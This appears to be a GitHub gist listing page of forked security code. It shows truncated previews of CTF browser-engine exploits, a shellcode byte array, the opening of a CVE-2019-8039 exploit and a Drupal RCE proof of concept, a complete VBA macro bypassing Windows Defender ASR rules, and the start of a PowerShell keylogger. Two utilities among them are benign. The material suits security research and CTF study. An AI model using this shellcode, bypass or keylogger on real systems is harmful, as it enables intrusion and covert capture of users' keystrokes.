ray raystyle
raystyle
/ exploit.js
Created
September 18, 2019 02:09
— forked from itszn/exploit.js
Trendmicro CTF ChakraCore exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5]; | |
| let conva = new ArrayBuffer(8) | |
| let convi = new Uint32Array(conva); | |
| let convf = new Float64Array(conva); | |
| function i2f(i) { | |
| convi[0] = i%0x100000000; | |
| convi[1] = i/0x100000000; | |
| return convf[0]; |
raystyle
/ poc.js
Created
September 18, 2019 02:07
— forked from thetlk/poc.js
realworldctf2019 accessible v8 exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let ab = new ArrayBuffer(8); | |
| let fv = new Float64Array(ab); | |
| let dv = new BigUint64Array(ab); | |
| let f2i = (f) => { | |
| fv[0] = f; | |
| return dv[0]; | |
| } |
raystyle
/ poc.js
Created
September 18, 2019 02:07
— forked from thetlk/poc.js
realworldctf2019 accessible v8 exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| let ab = new ArrayBuffer(8); | |
| let fv = new Float64Array(ab); | |
| let dv = new BigUint64Array(ab); | |
| let f2i = (f) => { | |
| fv[0] = f; | |
| return dv[0]; | |
| } |
raystyle
/ CVE-2019-8039.js
Created
September 12, 2019 10:17
— forked from zuypt/CVE-2019-8039.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| console.show() | |
| function gc() { | |
| for(var i = 0; i < 3; i++) { | |
| var z = new ArrayBuffer(1024*1024*100) | |
| } | |
| } | |
| String.prototype.hex = function() { | |
| var r = '' |
raystyle
/ PatchExtract125.ps1
Created
May 28, 2019 02:01
— forked from moshekaplan/PatchExtract125.ps1
Patch Extract v1.25 by Greg Linares (@Laughing_Mantis)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| ================ | |
| PATCHEXTRACT.PS1 | |
| ================= | |
| Version 1.25 Microsoft MSU Patch Extraction and Patch Organization Utility by Greg Linares (@Laughing_Mantis) | |
| This Powershell script will extract a Microsoft MSU update file and then organize the output of extracted files and folders. | |
| Organization of the output files is based on the patch's files and will organize them based on their archicture (x86, x64, or wow64) | |
| as well as their content-type, ie: resource and catalog files will be moved to a JUNK subfolder and patch binaries and index files will |
raystyle
/ ASR Rules Bypass.vba
Created
May 7, 2019 08:28
— forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
raystyle
/ gist:b6a7961eeb28331637e370ae911af16d
Created
April 28, 2019 03:32
— forked from dasgoll/gist:7ca1c059dd3b3fbc7277
Simple Windows Keylogger using PowerShell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #requires -Version 2 | |
| function Start-KeyLogger($Path="$env:temp\keylogger.txt") | |
| { | |
| # Signatures for API Calls | |
| $signatures = @' | |
| [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] | |
| public static extern short GetAsyncKeyState(int virtualKeyCode); | |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] | |
| public static extern int GetKeyboardState(byte[] keystate); | |
| [DllImport("user32.dll", CharSet=CharSet.Auto)] |
raystyle
/ pwn.js
Created
April 8, 2019 03:21
— forked from saelo/pwn.js
Exploit for the "roll a d8" challenge of PlaidCTF 2018
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018. | |
| // N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d | |
| // | |
| // Scroll down do "BEGIN EXPLOIT" to skip the utility functions. | |
| // | |
| // Copyright (c) 2018 Samuel Groß | |
| // | |
| // |
raystyle
/ SimpleTCGLogParser.ps1
Created
March 15, 2019 05:05
— forked from mattifestation/SimpleTCGLogParser.ps1
If you have the HgsDiagnostics PowerShell module, then you can parse TCG logs.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Import-Module HgsDiagnostics | |
| $GetHgsTrace = Get-Command Get-HgsTrace | |
| $RemoteAttestationCoreReference = $GetHgsTrace.ImplementingType.Assembly.GetReferencedAssemblies() | Where-Object { $_.Name -eq 'Microsoft.Windows.RemoteAttestation.Core' } | |
| Add-Type -AssemblyName $RemoteAttestationCoreReference.FullName | |
| $MostRecentTCGLog = Get-ChildItem C:\Windows\Logs\MeasuredBoot | Sort-Object -Property LastWriteTime -Descending | Select-Object -First 1 | Select-Object -ExpandProperty FullName | |
| $LogBytes = [IO.File]::ReadAllBytes($MostRecentTCGLog) | |
| $ParsedTCGLog = [Microsoft.Windows.RemoteAttestation.Core.TcgEventLog]::Parse($LogBytes) | |
| $ParsedTCGLog.TcgData.Children | Sort-Object -Property PcrIndex | Group-Object -Property PcrIndex |
raystyle
/ cve-2019-6340.py
Created
February 25, 2019 09:02
— forked from leonjza/cve-2019-6340.py
CVE-2019-6340
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC | |
| # 2019 @leonjza | |
| # Technical details for this exploit is available at: | |
| # https://www.drupal.org/sa-core-2019-003 | |
| # https://www.ambionics.io/blog/drupal8-rce | |
| # https://twitter.com/jcran/status/1099206271901798400 |